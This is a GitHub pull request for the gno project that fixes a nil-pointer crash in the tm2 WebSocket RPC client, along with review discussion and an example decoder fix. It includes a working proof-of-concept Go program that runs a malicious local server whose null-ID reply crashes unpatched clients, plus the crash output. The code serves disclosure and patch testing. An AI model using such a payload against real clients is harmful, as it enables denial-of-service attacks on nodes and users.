
fix(tm2/client): segfault on requests containing nil ID#5114

Open
Davphla wants to merge 10 commits into gnolang:master from Davphla:fix/crash-client

Conversation

@Davphla
Member

@Davphla Davphla commented Feb 3, 2026

fix: https://github.com/gnolang/gno/security/advisories/GHSA-83x9-8m84-6fgj

I also fixed the missing nil verification on the non-exploitable client-controlled functions.


Single request test:

davd@davd ~/P/gno (master)> go run main.go
[*] Connecting to malicious server...
[*] Sending request...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x751ef9]

goroutine 20 [running]:
github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws.(*Client).runReadRoutine(0xc000214140, {0x90f3d0, 0xc0002100f0})
        /home/davd/Projects/gno/tm2/pkg/bft/rpc/lib/client/ws/client.go:235 +0x2d9
created by github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws.NewClient in goroutine 1
        /home/davd/Projects/gno/tm2/pkg/bft/rpc/lib/client/ws/client.go:63 +0x245
exit status 2
davd@davd ~/P/gno (master) [1]> git checkout fix/crash-client
Switched to branch 'fix/crash-client'
Your branch is up to date with 'origin/fix/crash-client'.
davd@davd ~/P/gno (fix/crash-client)> go run main.go
[*] Connecting to malicious server...
[*] Sending request...
[!] No crash - vulnerability may be patched
main.go:

package main

import (
	"context"
	"fmt"
	"log"
	"net/http"
	"time"

	ws "github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/client/ws"
	types "github.com/gnolang/gno/tm2/pkg/bft/rpc/lib/types"
	"github.com/gorilla/websocket"
)

var upgrader = websocket.Upgrader{}

func main() {
	// Start the malicious server: accept the WebSocket upgrade, wait for one
	// request, then answer with a JSON-RPC response whose ID is null.
	go http.ListenAndServe(":26657", http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		conn, err := upgrader.Upgrade(w, r, nil)
		if err != nil {
			return
		}
		defer conn.Close()

		conn.ReadMessage() // Wait for request
		// Send response with null ID -> crashes the unpatched client
		conn.WriteMessage(websocket.TextMessage, []byte(`{"jsonrpc":"2.0","id":null}`))
	}))

	time.Sleep(50 * time.Millisecond)

	// Connect victim client
	fmt.Println("[*] Connecting to malicious server...")
	client, err := ws.NewClient("ws://127.0.0.1:26657")
	if err != nil {
		log.Fatalf("connect: %v", err)
	}
	defer client.Close()

	fmt.Println("[*] Sending request...")
	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()

	// On an unpatched client the panic happens in the read routine while the
	// null-ID response is being handled; the call itself may simply time out.
	client.SendRequest(ctx, types.RPCRequest{
		JSONRPC: "2.0",
		ID:      types.JSONRPCStringID("1"),
		Method:  "status",
	})

	// If we get here, the bug is fixed
	fmt.Println("[!] No crash - vulnerability may be patched")
}

@github-actions github-actions bot added the 📦 🌐 tendermint v2 Issues or PRs tm2 related label Feb 3, 2026
@Gno2D2 Gno2D2 added the review/triage-pending PRs opened by external contributors that are waiting for the 1st review label Feb 3, 2026
@Gno2D2
Collaborator

Gno2D2 commented Feb 3, 2026

🛠 PR Checks Summary

All Automated Checks passed. ✅

Manual Checks (for Reviewers):
  • IGNORE the bot requirements for this PR (force green CI check)
  • The pull request description provides enough details (checked by @thehowl)

✅ Automated Checks (for Contributors):

🟢 Maintainers must be able to edit this pull request (more info)
🟢 Pending initial approval by a review team member, or review from tech-staff

☑️ Contributor Actions:
  1. Fix any issues flagged by automated checks.
  2. Follow the Contributor Checklist to ensure your PR is ready for review.
    • Add new tests, or document why they are unnecessary.
    • Provide clear examples/screenshots, if necessary.
    • Update documentation, if required.
    • Ensure no breaking changes, or include BREAKING CHANGE notes.
    • Link related issues/PRs, where applicable.
☑️ Reviewer Actions:
  1. Complete manual checks for the PR, including the guidelines and additional checks if applicable.
Automated Checks
Maintainers must be able to edit this pull request (more info)

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 The base branch matches this pattern: ^master$
    └── 🟢 The pull request was created from a fork (head branch repo: Davphla/gno)

Then

🟢 Requirement satisfied
└── 🟢 Maintainer can modify this pull request

Pending initial approval by a review team member, or review from tech-staff

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 The base branch matches this pattern: ^master$
    └── 🟢 Not (🔴 Pull request author is a member of the team: tech-staff)

Then

🟢 Requirement satisfied
└── 🟢 If
    ├── 🟢 Condition
    │   └── 🟢 Or
    │       ├── 🟢 User omarsy already reviewed PR 5114 with state APPROVED
    │       ├── 🔴 At least 1 user(s) of the team tech-staff reviewed pull request
    │       └── 🔴 This pull request is a draft
    └── 🟢 Then
        └── 🟢 Not (🔴 This label is applied to pull request: review/triage-pending)

Manual Checks
**IGNORE** the bot requirements for this PR (force green CI check)

If

🟢 Condition met
└── 🟢 On every pull request

Can be checked by

  • Any user with comment edit permission
The pull request description provides enough details

If

🟢 Condition met
└── 🟢 And
    ├── 🟢 Not (🔴 Pull request author is a member of the team: core-contributors)
    └── 🟢 Not (🔴 Pull request author is user: dependabot[bot])

Can be checked by

  • team core-contributors

@codecov

codecov bot commented Feb 3, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.


@Davphla Davphla changed the title fix(tm2/ws): segfault on malformed request containing nil ID fix(tm2/ws): segfault on malformed requests containing nil ID Feb 3, 2026
@Davphla Davphla changed the title fix(tm2/ws): segfault on malformed requests containing nil ID fix(tm2/client/ws): segfault on malformed requests containing nil ID Feb 3, 2026
@zivkovicmilos zivkovicmilos self-requested a review February 3, 2026 13:49
@thehowl
Member

thehowl commented Feb 3, 2026

I think the more appropriate fix is to return an error in the UnmarshalJSON method of RPCResponse, which looks to be the real culprit:

// Check if any response ID is set
if unsafeResp.ID == nil {
	return nil
}

In fact, we already return an error in the equivalent case of unmarshaling into a RPCRequest.

@zivkovicmilos
Member

> I think the more appropriate fix is to return an error in the UnmarshalJSON method of RPCResponse, which looks to be the real culprit:
>
>     // Check if any response ID is set
>     if unsafeResp.ID == nil {
>         return nil
>     }
>
> In fact, we already return an error in the equivalent case of unmarshaling into a RPCRequest.

Agreed, easier to manage.

Just a note on the nullability of the ID:
https://www.jsonrpc.org/specification#response_object

@jefft0
Contributor

jefft0 commented Feb 3, 2026

The CI check of TM2 failed for "TestWALCrash". This happens on many PRs, maybe 25% of the time. After running again it may pass.

@jefft0 jefft0 removed the review/triage-pending PRs opened by external contributors that are waiting for the 1st review label Feb 3, 2026
@Gno2D2 Gno2D2 added the review/triage-pending PRs opened by external contributors that are waiting for the 1st review label Feb 3, 2026
@Kouteki Kouteki requested a review from moul February 3, 2026 14:30
@Kouteki Kouteki moved this from Triage to In Review in 🧙‍♂️Gno.land development Feb 3, 2026
@Kouteki Kouteki added this to the 🚀 Mainnet beta launch milestone Feb 3, 2026
@Davphla
Member Author

Davphla commented Feb 3, 2026

I've simplified the fix by generalizing the error in UnmarshalJSON for Response and Request when ID == nil.
Requests with ID == nil can be correct by the specification (for implementing notifications), but they aren't supported in tm2, as a request always has an ID (see tm2/pkg/bft/rpc/client/client.go:L351).
This may be too strict; the request error can be reverted.
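As an added example (not tm2's code and not part of this PR), here is the shape of the fix thehowl describes and Davphla then generalizes, with hypothetical type names (jsonrpcID, rpcResponse, parseID, dispatch): the decoder refuses a response whose id is missing or null, so the read loop that routes replies by ID never reaches a nil dereference, and a malformed server message becomes an error the loop can log and drop instead of a SIGSEGV. The same parseID rule is what a request decoder would reuse to reject id-less requests (notifications). One caveat from the spec link above: JSON-RPC 2.0 does allow "id": null in an error response when the server could not read the request id, so rejecting it means such errors are dropped as unroutable rather than delivered, which is the right trade for a client that could never match them to a pending request anyway.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// jsonrpcID is a hypothetical stand-in for tm2's ID type: a string or a number.
type jsonrpcID interface{ String() string }

type stringID string
type intID int64

func (s stringID) String() string { return string(s) }
func (i intID) String() string    { return fmt.Sprintf("%d", int64(i)) }

// parseID accepts the id forms JSON-RPC 2.0 allows and rejects a missing or
// null id, so a nil jsonrpcID can never leave this function without an error.
func parseID(raw json.RawMessage) (jsonrpcID, error) {
	if len(raw) == 0 || string(raw) == "null" {
		return nil, errors.New("id cannot be nil")
	}
	var s string
	if err := json.Unmarshal(raw, &s); err == nil {
		return stringID(s), nil
	}
	var n int64
	if err := json.Unmarshal(raw, &n); err == nil {
		return intID(n), nil
	}
	return nil, fmt.Errorf("unsupported id %s", raw)
}

type rpcError struct {
	Code    int    `json:"code"`
	Message string `json:"message"`
}

// rpcResponse is the decoded form; ID is non-nil after a successful decode.
type rpcResponse struct {
	JSONRPC string
	ID      jsonrpcID
	Result  json.RawMessage
	Error   *rpcError
}

// UnmarshalJSON decodes the wire shape first. json.RawMessage keeps a literal
// null visible, which is what lets the id check below fire.
func (r *rpcResponse) UnmarshalJSON(data []byte) error {
	var u struct {
		JSONRPC string          `json:"jsonrpc"`
		ID      json.RawMessage `json:"id"`
		Result  json.RawMessage `json:"result"`
		Error   *rpcError       `json:"error"`
	}
	if err := json.Unmarshal(data, &u); err != nil {
		return err
	}
	id, err := parseID(u.ID) // the fix: reject here instead of returning nil
	if err != nil {
		return fmt.Errorf("invalid response: %w", err)
	}
	r.JSONRPC, r.ID, r.Result, r.Error = u.JSONRPC, id, u.Result, u.Error
	return nil
}

// dispatch is what a read loop does with a server message: route it to the
// pending request with the same id. Because decoding rejects a nil id, the
// resp.ID.String() call can no longer dereference nil; a malformed message
// becomes an error the caller logs and drops.
func dispatch(pending map[string]chan rpcResponse, msg []byte) error {
	var resp rpcResponse
	if err := json.Unmarshal(msg, &resp); err != nil {
		return err
	}
	ch, ok := pending[resp.ID.String()]
	if !ok {
		return fmt.Errorf("no pending request for id %q", resp.ID.String())
	}
	ch <- resp
	return nil
}

func main() {
	pending := map[string]chan rpcResponse{"1": make(chan rpcResponse, 1)}
	// Constructed server messages: the malicious null-id reply and a valid one.
	for _, msg := range []string{`{"jsonrpc":"2.0","id":null}`, `{"jsonrpc":"2.0","id":"1","result":{}}`} {
		fmt.Printf("%s -> err=%v\n", msg, dispatch(pending, []byte(msg)))
	}
}
```

The important design choice is where the nil is stopped: in the decoder, not at each use site. Adding a nil check in runReadRoutine alone would fix this crash, but every other consumer of a decoded response would still have to remember the same check, which is why the thread converged on returning an error from UnmarshalJSON.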

@Davphla Davphla changed the title fix(tm2/client/ws): segfault on malformed requests containing nil ID fix(tm2/client/ws): segfault on requests containing nil ID Feb 3, 2026
@Davphla Davphla changed the title fix(tm2/client/ws): segfault on requests containing nil ID fix(tm2/client): segfault on requests containing nil ID Feb 3, 2026
Comment on lines 79 to 81
if unsafeReq.ID == nil {
return nil
return errors.New("request ID cannot be nil")
}
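Review bot: replacing `return nil` with `return errors.New("request ID cannot be nil")` on the `unsafeReq.ID == nil` branch turns a request that was silently accepted into a decode error, which rejects JSON-RPC notifications (requests that legitimately omit id), so this is a behaviour change beyond the response-side segfault fix; since the description says tm2 never sends id-less requests, add a one-line comment on this branch stating that notifications are intentionally unsupported, and because the same check is being added to RPCResponse, consider the simplification raised in this thread of letting parseID return the error so both decoders share one path.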
Member

question: maybe we can remove this and let parseID return the error?

Member Author

I've simplified it: 6b95e39

@Gno2D2 Gno2D2 removed the review/triage-pending PRs opened by external contributors that are waiting for the 1st review label Feb 3, 2026

Labels

📦 🌐 tendermint v2 Issues or PRs tm2 related

Projects

Status: In Review


7 participants